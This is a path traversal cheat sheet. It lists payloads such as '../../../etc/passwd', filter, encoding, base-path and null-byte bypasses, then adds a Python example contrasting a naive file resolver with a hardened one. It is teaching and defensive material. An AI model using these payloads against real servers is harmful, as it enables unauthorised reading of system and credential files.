Path Traversal / File Inclusion

Path Traversal / Directory Traversal

No input validation

../../../etc/passwd
../../../windows/win.ini

Non-Recursive filtering bypass

The app strips "../" from the input only once (non-recursively), so a sequence that turns into "../" after one pass gets through

....//....//....//etc/passwd
..././..././..././etc/passwd

Absolute Path Bypass

/etc/passwd

Encoding bypass

If the app decodes the input and then checks it, try double-encoding the "/" so the traversal sequence only appears after the second decode

  • URL encode the "/" then URL encode every character

..%25%32%66
  • URL encode the "/" then URL encode the result

..%252f

Burp Suite Pro includes a Path Traversal fuzzing wordlist.

Validation of starting path bypass

Sometimes the application requires that the supplied filename begins with a base folder. We can include this base folder and add in the traversal sequences after it.

/var/www/images/../../../etc/passwd

File extension validation bypass

If the app verifies that the path ends with a certain file extension, try a null byte to terminate the path before the extension

../../../etc/passwd%00.png
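The bypasses above all target the same defensive mistake: filtering or inspecting the raw input instead of canonicalising the path and checking where it lands. The following is an added example (not code from the original page) showing the broken pattern next to a hardened resolver that handles every case listed on this page: non-recursive filtering, absolute paths, double encoding, a trusted base-folder prefix, and the null-byte extension trick. The base directory `/var/www/images` and the allowed extensions are assumed values for illustration.

```python
import posixpath
from typing import Optional, Tuple
from urllib.parse import unquote

# Assumed web root for served files (example value, not from the page)
BASE_DIR = "/var/www/images"
ALLOWED_EXT: Tuple[str, ...] = (".png", ".jpg")


def naive_resolve(user_path: str) -> str:
    """The broken pattern: strip '../' once, then join onto the base dir.

    Non-recursive stripping lets '....//' collapse into '../', and
    posixpath.join discards BASE_DIR entirely when the second argument
    is absolute, so '/etc/passwd' is returned as-is.
    """
    cleaned = user_path.replace("../", "")
    return posixpath.normpath(posixpath.join(BASE_DIR, cleaned))


def safe_resolve(user_path: str,
                 base_dir: str = BASE_DIR,
                 allowed_ext: Tuple[str, ...] = ALLOWED_EXT) -> Optional[str]:
    """Return the canonical path under base_dir, or None to reject.

    Canonicalises instead of filtering, so the exact traversal spelling
    does not matter: only the final location is checked.
    """
    # 1. Decode exactly once. Any '%' left afterwards means the client
    #    double-encoded; reject rather than decoding again.
    decoded = unquote(user_path)
    if "%" in decoded:
        return None
    # 2. Null bytes: C-based file APIs truncate at \0, which would defeat
    #    the extension check below. Reject outright.
    if "\x00" in decoded:
        return None
    # 3. Treat backslashes as separators so Windows-style sequences are
    #    normalised the same way as forward slashes.
    decoded = decoded.replace("\\", "/")
    # 4. Absolute paths are never valid for a file-serving parameter.
    if decoded.startswith("/"):
        return None
    # 5. Canonicalise, then require the result to be base_dir itself or
    #    something strictly inside it (prefix check on the *output*, with a
    #    trailing '/' so '/var/www/images2' cannot pass as '/var/www/images').
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    # 6. Extension check runs on the canonical, fully decoded path, so a
    #    null byte or encoded suffix cannot smuggle a different file type.
    if not candidate.lower().endswith(allowed_ext):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample inputs: the page's payloads plus one legitimate name.
    for p in ["cat.png", "../../../etc/passwd", "....//....//....//etc/passwd",
              "/etc/passwd", "..%252f..%252fetc/passwd",
              "/var/www/images/../../../etc/passwd", "../../../etc/passwd%00.png"]:
        print(f"{p!r:45} naive={naive_resolve(p)!r:30} safe={safe_resolve(p)!r}")
```

In a real handler the canonical string should additionally be passed through `os.path.realpath` (or opened with `O_NOFOLLOW`) before the prefix check, so that symlinks inside the base directory cannot point back out of it; that step is left out here only so the example runs without a filesystem.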
